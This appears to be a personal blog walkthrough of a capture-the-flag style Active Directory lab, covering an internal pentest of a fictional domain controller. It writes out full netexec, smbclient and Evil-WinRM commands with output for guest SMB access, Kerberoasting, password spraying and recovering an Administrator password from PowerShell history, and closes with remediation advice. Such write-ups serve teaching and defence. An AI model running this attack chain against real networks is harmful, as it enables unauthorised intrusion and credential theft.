Persecure : my learning archive

HackSmarter: MartiniAD

MartiniAD

A HackSmarter walkthrough

The Setup

Martini Bars, an adult beverage company, had a corporate breach. Their compliance and risk team requested a penetration test at one of the branch offices, and the HackSmarter team was authorized to run an internal black-box pentest.

This is black box, so I start with nothing. The client gave me VPN access to their internal network. No usernames, no passwords. I connected to the VPN and began.

Step 1: Recon With Nmap

I scanned the host to see what was running.

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: DRY.MARTINI.BARS)
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: DRY.MARTINI.BARS)
3389/tcp  open  ms-wbt-server
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0
9389/tcp  open  mc-nmf        .NET Message Framing

Ports 53, 88, 389, and 445 open together point to a Domain Controller. The certificate and RDP info confirmed it.

DNS_Computer_Name: DC01.DRY.MARTINI.BARS
Product_Version: 10.0.26100

The target is a DC named DC01 in the domain DRY.MARTINI.BARS, running Windows Server. Ports 5985 (WinRM) and 3389 (RDP) are also open.

Step 2: Add DC01 to the Hosts File

Kerberos and AD tooling need names, not just IP addresses, so I added the DC to my hosts file.

sudo sh -c 'echo "10.0.30.48 DC01.DRY.MARTINI.BARS DRY.MARTINI.BARS" >> /etc/hosts'

The DC’s full hostname goes first as the main name, with the domain after it as an alias.

Step 3: SMB With No Password

I had no credentials, so I tried a null/guest session against SMB.

nxc smb 10.0.30.48 -u 'a' -p '' --shares
SMB    10.0.30.48    445    DC01    [+] DRY.MARTINI.BARS\a: (Guest)
SMB    10.0.30.48    445    DC01    Share      Permissions   Remark
SMB    10.0.30.48    445    DC01    -----      -----------   ------
SMB    10.0.30.48    445    DC01    IPC$       READ          Remote IPC
SMB    10.0.30.48    445    DC01    NETLOGON                 Logon server share
SMB    10.0.30.48    445    DC01    notes      READ,WRITE
SMB    10.0.30.48    445    DC01    SYSVOL                   Logon server share

Guest access was on. There was a share called notes that I could read and write with no login.

Step 4: Read the Notes Share

I connected to the share with no password and listed the contents.

smbclient //10.0.30.48/notes --no-pass
smb: \> ls
  notes.txt    A    129   Sat Jun 27 08:24:43 2026

I opened the file.

- Order more gin for lakeside
- Look for an engagement ring
- Check that notes works from Linux Mint
creds
mprice:*xxxxx*

The file held a username and password: mprice : martini

Step 5: Authenticated Enumeration

The credentials worked.

nxc smb 10.0.30.48 -u mprice -p '*xxxxx*'
SMB    10.0.30.48    445    DC01    [+] DRY.MARTINI.BARS\mprice:*xxxxx*

I listed the domain users.

nxc smb 10.0.30.48 -u mprice -p '*xxxxx*' --users
SMB    10.0.30.48    445    DC01    Administrator
SMB    10.0.30.48    445    DC01    Guest
SMB    10.0.30.48    445    DC01    krbtgt
SMB    10.0.30.48    445    DC01    mprice
SMB    10.0.30.48    445    DC01    athena.t0
SMB    10.0.30.48    445    DC01    ATHENA_SVC

Two accounts stood out: the service account ATHENA_SVC and athena.t0.

Step 6: Kerberoast the Service Account

Any authenticated user can request a service ticket for a service account. The ticket is encrypted with the account’s password and can be cracked offline.

nxc ldap 10.0.30.48 -u mprice -p '*xxxxx*' --kerberoasting roast.txt
LDAP   10.0.30.48    389    DC01    [*] sAMAccountName: ATHENA_SVC
LDAP   10.0.30.48    389    DC01    $krb5tgs$23$*ATHENA_SVC$DRY.MARTINI.BARS...

I cracked the ticket offline.

ATHENA_SVC : 1xxxxx

The LDAP output showed this account is in Remote Management Users and Remote Desktop Users, so it can log in over WinRM and RDP.

Step 7: Get a Shell

I checked WinRM.

nxc winrm 10.0.30.48 -u 'athena_svc' -p 'xxxxx'
WINRM  10.0.30.48    5985    DC01    [+] DRY.MARTINI.BARS\athena_svc:xxxxx (Pwn3d!)

Pwn3d means I can get an interactive shell. RDP worked too.

Step 8: Password Spray

I sprayed the same password across every account I had found.

nxc smb 10.0.30.48 -u users.txt -p 'xxxxx' --continue-on-success
SMB    10.0.30.48    445    DC01    [+] DRY.MARTINI.BARS\athena.t0:xxxxx (Pwn3d!)
SMB    10.0.30.48    445    DC01    [+] DRY.MARTINI.BARS\ATHENA_SVC:xxxxx

athena.t0 used the same password as the service account.

Step 9: Read the PowerShell History

With a shell as ATHENA_SVC, I checked the PowerShell history file.

*Evil-WinRM* PS C:\> type C:\Users\ATHENA_SVC\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
net user administrator "ebz0yxyxxxxx*yeh"

Someone had reset the Administrator password from this account and left the command in the history.

Step 10: Domain Admin

I confirmed the Administrator password.

nxc smb 10.0.30.48 -u administrator -p 'ebz0xxxxx'
SMB    10.0.30.48    445    DC01    [+] DRY.MARTINI.BARS\administrator:ebz0yxyxxxxx (Pwn3d!)

Pwn3d on the Administrator account. With two privileged accounts, the final step is to dump the domain hashes with secretsdump, including the KRBTGT hash.

Remediation

Turn off guest and null SMB access, and lock down share permissions so no share is world-writable. Never store credentials in files. Give service accounts long random passwords or use Group Managed Service Accounts. Do not reuse passwords across accounts. Avoid typing passwords into commands, and clear PowerShell history on sensitive hosts.